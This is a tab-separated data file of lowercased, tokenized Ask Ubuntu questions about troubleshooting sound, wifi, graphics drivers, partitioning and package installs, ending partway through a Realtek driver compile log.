407988	correct sound card , wrong device	i have had a persistent issue for some time , it is with my sound . when i plug external speakers in i get sound , but the speakers on my laptop dont work ... well they do for 20 seconds then they go quiet ( 20 seconds after rebooting ) my output from aplay -l is : list of playback hardware devices card 0 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : sb [ hda ati sb ] , device 0 : cx20585 analog [ cx20585 analog ] subdevices : 0/1 subdevice # 0 : subdevice # 0 i have checked in alsamixer if i was muted but it is n't . i cant change any volume ni alsamixer either . i 'm thinking its reading the correct card but not the correct device . i have tried hundreds of online solutions but none seem to have worked . i even tried downgrading to 12.04 but i still had the same issue . according to alsamixer card : hd-audio generic chip : ati r6xx hdmi can anyone help with this long term problem ive had , any help is appreciated
407989	issue with broadcom 4313 under ubuntu 13.10	i have been stucked for almost a week finding way to make my wifi work . i 'm using ubuntu 13.10 as the title says well i have broadcom bcm4313 , right now i 've followed all possible steps by purging bcmwl-kernel-source and blacklisting wl and other stuffs . i know that there are issue similar like this , anyone who has workaround ?
407990	how to partition with gparted ?	i have just copied my ubuntu 64bit iso into my usb flash drive and booted from there . it 's my first time using a linux distro , right now i 'm using windows 8 and writing this from the try ubuntu option . i 'm just trying to install ubuntu along with windows 8 , to keep both and select which one i want to start when i turn on my machine . i know there are similar questions , but no one helped me . i execute the gparted program to make a partition of the hard disk . this is what i have . can you see the red icon at the /dev/sda2 partition ? that 's the windows 8 system , and the sda1 is the windows 8 booter ( as far as i know ) . i do right-click on the sda2 partition and try to reduce the size to something like 700mb to let 300mb to my new ubuntu system . but it 's locked . it does n't let me to resize or touch anything . it let me when resizing the sda1 partition but not the one with the red icon . this is what i 'm getting while doing right-click > information on /dev/sda2 . i 'm very very new in this linux-based world , so , how can i make a new partition to install this beautiful operating system ? thanks a lot .
407991	can you get rid of the install or try screen ?	i am using ubuntu on a flash drive , so i can use any computer with it . although , i found , to my annoyance , that every time i completely rebooted a computer , or booted it on a new one , it asked me if i wanted to `` try ubuntu '' or `` install along your original operating system '' . is there a way to get rid of this screen so it does n't show again ?
407993	how to play mss2 encoded video files	vlc player and totem video player ca n't play mss2 video encoded video files but i could play them under ubuntu by compiling ffmpeg library . now ffplay can play these files . my question is if there is any way to add these codecs to system so that vlc player or totem video player can also play these files . i tried `` sudo make install '' in my ffmpeg folder but it seems it has no effect on system codecs . thank you .
407996	black screen after install ... .	i did a clean install of ubuntu on my pc , but after restarting my screen is just black and has been for about two hours now ... any ideas to help me with this ? i installed the 64-bit version on a p4 3.2ghz machine with 4gb of ram ... should i try the 32-bit ? or is it something deeper maybe ?
407998	syntax of terminal commands	the syntax of a terminal command will be something like the following : command -option argument but the following git command seems irregular , can anyone explain the syntax of it . ( why two commands ? why two arguments ? ) git config -- global user.email `` your_email @ example.com ''
408000	is the a way to download a file to ftp from chrome ?	is there a way to download files while browsing in chrome to my ftp server without opening another application or program or downloading it onto my computer ?
408002	how can i make a .jar executable + i 'm on ubuntu studio 13.10	how do i make my mine craft executable.ive tried running it in terminal and many forum answers . when i get to mine craft and i go into properties . and i look for allow to execute it does n't appear i have no option to make it executable . i suppose i must do it in the terminal yet i do not have the extra time for reading this whole thing java -h please help me get a quick easy or hard answer . < -- -- - original ive done what someone in the comments said and i got my computer to recognize it as a .jar but it still wo n't work i tried a very very helpful forum and learned some stuff but still nothing please help me guys i am stuck
408009	asus k55vd nvidia 610m ( ubuntu 13.10 )	how to install nvidia driver ? , tried everything on internet , ended with black screen ... fixed this , tried bumblebee ( this does not work ) ... what to do ?
408013	ca n't boot my usb windows installer in th bios under ubuntu 12.04	i made a bootable usb with the windows xp sp3 installer on it . when i ask the computer to boot from the usb in the bios it does n't let me ...
408017	why is openvpn sending packets each few seconds even with not connected vpn connection ?	after setting up a vpn connection with gnome 's networkmanager i have noticed that openvpn is sending each few seconds some packets to my vpn server that i am not currently connected to : 02:33:00.802963 ip xxxxxxxxxxx.44167 > ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn : udp , length 53 ; message type : p_data_v1 02:33:00.872163 ip ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn > xxxxxxxxxxx.44167 : udp , length 53 ; message type : p_data_v1 02:33:10.159852 ip xxxxxxxxxxx.44167 > ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn : udp , length 53 ; message type : p_data_v1 02:33:10.224316 ip ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn > xxxxxxxxxxx.44167 : udp , length 53 ; message type : p_data_v1 02:33:20.328793 ip ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn > xxxxxxxxxxx.44167 : udp , length 53 ; message type : p_data_v1 02:33:20.329198 ip xxxxxxxxxxx.44167 > ec2-54-xxx-xxx-xxx.eu-west-1.compute.amazonaws.com.openvpn : udp , length 53 ; message type : p_data_v1 any ideas why is it so ?
408019	how to prevent accidentally unmounting and destroying my windows drive from ubuntu ?	i recently installed ubuntu 13.10 alongside windows 8.1 and i had a question about preventing the unmounting of my windows drive . when i go into the file browser ( i think it 's called nautilus . it 's the ubuntu default one , anyways ) , i see my windows drive on the left panel . however , it has a little eject icon next to it . i 'm afraid i 'm going to accidentally click that button and completely wreck my windows partition . is there any way to remove this button and make that drive permanently mounted ( or at least make it harder to unmount it ) ? thanks !
408021	i 'm trying to install nodejs-legacy and it keeps failing	i have no idea what the problem is , but i keep trying to install nodejs-legacy by running sudo apt-get install , but it keeps failing . here 's all of the output when i try to do the command . reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : ax25-node libax25 libc-ares2 libv8-3.14.5 openbsd-inetd use 'apt-get autoremove ' to remove them . the following new packages will be installed : nodejs-legacy 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . 1 not fully installed or removed . need to get 0 b/15.4 kb of archives . after this operation , 119 kb of additional disk space will be used . ( reading database ... 198807 files and directories currently installed . ) unpacking nodejs-legacy ( from ... /nodejs-legacy_0.10.15~dfsg1-4_all.deb ) ... dpkg : error processing /var/cache/apt/archives/nodejs-legacy_0.10.15~dfsg1-4_all.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/node.1.gz ' , which is also in package nodejs 0.10.24-1chl1~saucy1 processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/nodejs-legacy_0.10.15~dfsg1-4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) solution : so i found the answer to my question in another thread . i had to use sudo dpkg -r nodejs-legacy and sudo apt-get -f install . so , credit for where credit is due , here is the link the answer that explained to me what i had to do . http : //askubuntu.com/a/185123/237774
408027	problem fixing splash screen/nvida driver issue	please bare with me as i am very new to ubuntu and am just beginning to learn . so i have seen several solutions to the splash screen issue however i am having problems executing the repair . once i enter sudo gedit /ect/default/grub i get this . ** ( gedit:11201 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:11201 ) : ibus-warning ** : the owner of /home/bob/.config/ibus/bus is not root ! ( gedit:11201 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service the gedit grub box will open but the screen is blank . there is no file to modify or view . i should also note that i have tried installing v86d hwinfo however i get this response package hwinfo is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source i have successfully installed v86d ( without the hwinfo )
408028	r.a.t 3 gaming mouse not responding in ubuntu 13.10	as the title says i ca n't get my madcatz mad catz r.a.t 3 mouse to work in ubuntu 13.10 . when i follow this youtube video right here : https : //www.youtube.com/watch ? v=0scda8qqqgc all that happens is my ubuntu would n't boot and i had to delete xorg.conf to fix it .
408032	heating issues in hp pavilion g7 with ubuntu 12.04	i have a notebook hp pavilion g7 running ubuntu 12.04 . i am having heating issues . i installed psensor and temperature is around 60 c. i 've read many forums with the same issue but they all seems to have a special video card without a driver or with an opensource driver . here 's my sysinfo : system information report , generated by sysinfo : 1/19/2014 9:50:45 pm http : //sourceforge.net/projects/gsysinfo system information running ubuntu linux , the ubuntu 12.04 ( precise ) release . gnome : unknown ( unknown ) kernel version : 3.8.0-35-generic ( # 50~precise1-ubuntu smp wed dec 4 17:28:45 utc 2013 ) gcc : 4.6 ( i686-linux-gnu ) xorg : 1.13.3 ( 16 october 2013 04:46:12pm ) ( 16 october 2013 04:46:12pm ) hostname : mayo uptime : 0 days 0 h 27 min cpu information genuineintel , intel ( r ) pentium ( r ) cpu p6200 @ 2.13ghz number of cpus : 2 cpu clock currently at 933.000 mhz with 3072 kb cache numbering : family ( 6 ) model ( 37 ) stepping ( 5 ) bogomips : 4256.50 flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm pcid popcnt lahf_lm arat dtherm memory information total memory : 1879 mb total swap : 3813 mb storage information scsi device - scsi0 vendor : ata model : hitachi hts54505 scsi device - scsi1 vendor : hp model : cddvdw ts-l633r hardware information motherboard host bridge intel corporation core processor reserved ( rev 02 ) subsystem : hewlett-packard company device 166a pci bridge ( s ) intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 82801 mobile pci bridge ( rev a5 ) ( prog-if 01 [ subtractive decode ] ) intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) ( prog-if 00 [ normal decode ] ) intel corporation 82801 mobile pci bridge ( rev a5 ) ( prog-if 01 [ subtractive decode ] ) isa bridge intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) subsystem : hewlett-packard company device 166a graphic card vga controller intel corporation core processor integrated graphics controller ( rev 02 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 166a sound card multimedia controller intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) subsystem : hewlett-packard company device 166a network network controller broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : hewlett-packard company device 1483 ethernet controller realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) subsystem : hewlett-packard company device 166a the output of lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) 7f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 7f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 7f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 7f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 7f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 7f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) and finally the output of sudo find /sys | grep drivers . *00:02.0 : /sys/bus/pci/drivers/i915/0000:00:02.0 am i missing a driver ? if so , which one ?
408033	com ports identification	i am a relative new user with ubuntu 13.10 and i have always been puzzled in trying to identify com ports . on windows systems it is an easy task but i have not mastered it on ubuntu . i have 3 usb to serial devices plugged into my computer and i need to know specifics about them and how to changed their parameters . my ham radio software crqlog needs this information . thanks richard , kc8rp
408038	missing unity desktop /w slim login manager	not too long ago i installed slim ( simple login manager ) as my login manager for ubuntu 13.04 just to give it a try out to replace the default ubuntu login manager . after getting slim successfully installed , i tested it out by logging out and then back in again , however after logging in again the unity desktop ui is missing , and wont show up again until i press ctrl+alt+t and type in unity into terminal to bring it back up again , i just wish to know how i can get unity to load properly after logging in with slim so i do n't have to do this on every login . another issue i have with slim , or not slim itself but ubuntu , i created a new normal user , however when i try to login with that user i get an error saying failed to execute login command and returns me back to the login of slim , i did a little reading on google , but nothing too specific on how to fix this issue of user login . i tried creating this new user via cli , but i think i might of screwed it up even though i typed it right , as all i typed was ; adduser -- comment `` temporary user '' user001 not sure if that was the right way of creating a new user , but correct me if i 'm wrong . i 'm trying to learn how to add and create new users through the cli instead of the gui as a good practice if i ever needed to test something .
408040	instaling tp-link tl-wn723n	i 've downloaded the driver from realtek.com as instructed here connecting to wifi internet using tp-link ( tl-wn723n ) usb adapter with ubuntu 12.10 isued the instruction : sudo bash ./install.sh but get the following errors . any help will be apreciated ruben @ ruben-hp-elitebook-8440p : ~/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 $ sudo bash ./install.sh # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911.tar.gz rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/ rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/runwpa rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/ ... ... ... rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.h rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/halpwrseqcmd.c rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/clean rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr rm -fr module.markers ; rm -fr modules.order cd core/efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd core ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c/usb ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8192c ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=i386 cross_compile= -c /lib/modules/3.11.0-15-generic/build m=/home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 modules make [ 1 ] : se ingresa al directorio «/usr/src/linux-headers-3.11.0-15-generic» cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_cmd.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_security.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_debug.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_io.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_query.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ioctl_set.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ieee80211.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_mlme_ext.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_wlan_util.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_pwrctrl.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_rf.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_recv.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sta_mgt.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_ap.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_xmit.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_p2p.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_tdls.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_br_ext.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_iol.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/rtw_sreset.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/core/efuse/rtw_efuse.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_intf.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/hal_com.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/dm.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_hal_init.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_phycfg.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rf6052.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_dm.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_rxdesc.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_cmd.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_halinit.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_led.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_xmit.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/rtl8192cu_recv.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/usb_ops_linux.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_sreset.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/rtl8192c_xmit.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/hal/rtl8192c/usb/hal8192cuhwimg.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/osdep_service.o cc [ m ] /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : in function ‘rtw_proc_init_one’ : /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:3 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:11 : warning : assignment makes pointer from integer without a cast [ enabled by default ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:3 : error : implicit declaration of function ‘create_proc_read_entry’ [ -werror=implicit-function-declaration ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:326:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` log_level '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:332:8 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_log_level ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:348:21 : warning : assignment makes pointer from integer without a cast [ enabled by default ] padapter- > dir_dev = create_proc_entry ( dev- > name , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:379:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` write_reg '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:385:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_write_reg ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:387:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` read_reg '' , s_ifreg | s_irugo , ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:393:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_read_reg ; ^ /home/ruben/descargas/tecnicos/drivers/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:396:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` fwstate '' , s_ifreg | s_irugo , ^ 